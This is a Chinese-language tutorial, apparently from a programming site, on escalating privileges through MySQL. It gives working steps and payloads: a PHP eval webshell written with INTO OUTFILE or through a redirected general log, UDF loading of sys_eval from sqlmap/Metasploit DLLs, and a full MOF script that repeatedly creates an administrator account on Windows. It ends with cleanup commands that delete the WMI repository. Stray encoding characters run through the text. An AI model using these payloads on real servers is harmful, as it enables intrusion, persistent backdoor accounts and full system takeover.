目錄
- 一、寫(xiě)入Webshell
- into outfile 寫(xiě)shell
- 日志文件寫(xiě)shell
- 二、UDF提權(quán)
- 三、MOF提權(quán)
- 總結(jié)
一����、寫(xiě)入Webshell
into outfile 寫(xiě)shell
前提條件:
1�����、知道網(wǎng)站物理路徑
2、高權(quán)限數(shù)據(jù)庫(kù)用戶
3�����、load_file() 開(kāi)啟 即 secure_file_priv 無(wú)限制
4、網(wǎng)站路徑有寫(xiě)入權(quán)限
首先基礎(chǔ)語(yǔ)法查詢是否 secure_file_priv 沒(méi)有限制
show global variables like '%secure_file_priv%';
| value |
說(shuō)明 |
| NULL |
不允許導(dǎo)入或?qū)С?/td>
|
| /var |
只允許在/var目錄導(dǎo)入導(dǎo)出 |
| 空 |
不限制目錄 |
在 MySQL 5.5 之前 secure_file_priv 默認(rèn)是空��,這個(gè)情況下可以向任意絕對(duì)路徑寫(xiě)文件
在 MySQL 5.5之后 secure_file_priv 默認(rèn)是 NULL��,這個(gè)情況下不可以寫(xiě)文件
如果滿足上述所有條件的話,那么可以嘗試使用下面的 SQL 語(yǔ)句來(lái)直接寫(xiě) shell:
select '?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php';
查看目標(biāo)路徑下,已寫(xiě)入shell.php文件
上菜刀連接
日志文件寫(xiě)shell
前提條件:
1���、Web 文件夾寬松權(quán)限可以寫(xiě)入
2�、Windows 系統(tǒng)下
3、高權(quán)限運(yùn)行 MySQL 或者 Apache
MySQL 5.0 版本以上會(huì)創(chuàng)建日志文件����,可以通過(guò)修改日志的全局變量來(lái) getshell
查看日志目錄
SHOW VARIABLES LIKE 'general%';
general_log 默認(rèn)關(guān)閉��,開(kāi)啟它可以記錄用戶輸入的每條命令,會(huì)把其保存在對(duì)應(yīng)的日志文件中����。
可以嘗試自定義日志文件�,并向日志文件里面寫(xiě)入內(nèi)容的話��,那么就可以成功 getshell:
更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';
查看當(dāng)前日志配置
目標(biāo)目錄下查看�����,寫(xiě)入了log.php文件
寫(xiě)入shell
select '?php @eval($_POST[cmd]); ?>'
上菜刀��,連接
二����、UDF提權(quán)
自定義函數(shù)��,是數(shù)據(jù)庫(kù)功能的一種擴(kuò)展。用戶通過(guò)自定義函數(shù)可以實(shí)現(xiàn)在 MySQL 中無(wú)法方便實(shí)現(xiàn)的功能����,其添加的新函數(shù)都可以在SQL語(yǔ)句中調(diào)用��,就像調(diào)用本機(jī)函數(shù) version() 等方便。
動(dòng)態(tài)鏈接庫(kù)
如果是 MySQL >= 5.1 的版本,必須把 UDF 的動(dòng)態(tài)鏈接庫(kù)文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創(chuàng)建自定義函數(shù)。
那么動(dòng)態(tài)鏈接庫(kù)文件去哪里找呢?實(shí)際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對(duì)應(yīng)系統(tǒng)的動(dòng)態(tài)鏈接庫(kù)文件��。
sqlmap的UDF動(dòng)態(tài)鏈接庫(kù)文件位置
sqlmap根目錄/data/udf/mysql
不過(guò) sqlmap 中 自帶這些動(dòng)態(tài)鏈接庫(kù)為了防止被誤殺都經(jīng)過(guò)編碼處理過(guò)����,不能被直接使用。不過(guò)可以利用 sqlmap 自帶的解碼工具cloak.py 來(lái)解碼使用,cloak.py 的位置為:sqlmap根目錄/extra/cloak/cloak.py ����,
解碼方法如下:
解碼32位的windows動(dòng)態(tài)鏈接庫(kù):
python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll
其他linux和windows動(dòng)態(tài)鏈接庫(kù)解碼類似
或者直接使用metasploit自帶的動(dòng)態(tài)鏈接庫(kù),無(wú)需解碼
Metasploit的UDF動(dòng)態(tài)鏈接庫(kù)文件位置
接下來(lái)的任務(wù)是把 UDF 的動(dòng)態(tài)鏈接庫(kù)文件放到 MySQL 的插件目錄下��,這個(gè)目錄改如何去尋找呢?可以使用如下的 SQL 語(yǔ)句來(lái)查詢:
show variables like '%plugin%'
寫(xiě)入動(dòng)態(tài)鏈接庫(kù)
當(dāng) secure_file_priv 無(wú)限制的時(shí)候,我們可以手工寫(xiě)文件到 plugin 目錄下的
select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll') into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';
c
創(chuàng)建自定義函數(shù)并調(diào)用命令
創(chuàng)建自定義函數(shù)
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
查看是否新增了sys_eval
接著就可以通過(guò)創(chuàng)建的這個(gè)函數(shù)來(lái)執(zhí)行系統(tǒng)命令了:
刪除自定義函數(shù)
三、MOF提權(quán)
mof提權(quán)原理
關(guān)于 mof 提權(quán)的原理其實(shí)很簡(jiǎn)單��,就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件,每分鐘都會(huì)在一個(gè)特定的時(shí)間去執(zhí)行一次的特性,來(lái)寫(xiě)入我們的cmd命令使其被帶入執(zhí)行。
嚴(yán)苛的前提條件:
1.windows 03及以下版本
2.mysql啟動(dòng)身份具有權(quán)限去讀寫(xiě)c:/windows/system32/wbem/mof目錄
3.secure-file-priv參數(shù)不為null
提權(quán)過(guò)程:
MOF文件每五秒就會(huì)執(zhí)行,而且是系統(tǒng)權(quán)限,我們通過(guò)mysql使用load_file 將文件寫(xiě)入/wbme/mof��,然后系統(tǒng)每隔五秒就會(huì)執(zhí)行一次我們上傳的MOF�����。MOF當(dāng)中有一段是vbs腳本,我們可以通過(guò)控制這段vbs腳本的內(nèi)容讓系統(tǒng)執(zhí)行命令��,進(jìn)行提權(quán)。
利用代碼如下(test.mof):
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
MOF文件利用:
將上面的腳本上傳到有讀寫(xiě)權(quán)限的目錄下:
這里我上傳到了C:\soft\��,我們使用sql語(yǔ)句將文件導(dǎo)入到c:/windows/system32/wbem/mof/下
select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"
驗(yàn)證提權(quán):
當(dāng)我們成功把mof導(dǎo)出時(shí)��,mof就會(huì)直接被執(zhí)行���,且5秒創(chuàng)建一次用戶。
關(guān)于MOF提權(quán)弊端
我們提權(quán)成功后��,就算被刪號(hào),mof也會(huì)在五秒內(nèi)將原賬號(hào)重建����,那么這給我們退出測(cè)試造成了很大的困擾�����,所以謹(jǐn)慎使用����。那么我們?nèi)绾蝿h掉我們的入侵賬號(hào)呢�����?
cmd 下運(yùn)行下面語(yǔ)句:
#停止winmgmt服務(wù)
net stop winmgmt
#刪除 Repository 文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\
# 手動(dòng)刪除 mof 文件
del c:/windows/system32/wbem/mof/nullevt.mof /F /S
# 刪除創(chuàng)建的用戶
net user hpdoger /delete
#重啟服務(wù)
net start winmgmt
總結(jié)
到此這篇關(guān)于Mysql提權(quán)姿勢(shì)的文章就介紹到這了,更多相關(guān)Mysql提權(quán)姿勢(shì)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家�����!
您可能感興趣的文章:- Linux利用UDF庫(kù)實(shí)現(xiàn)Mysql提權(quán)
- Mysql提權(quán)方法利用
- 提權(quán),以MySQL之名
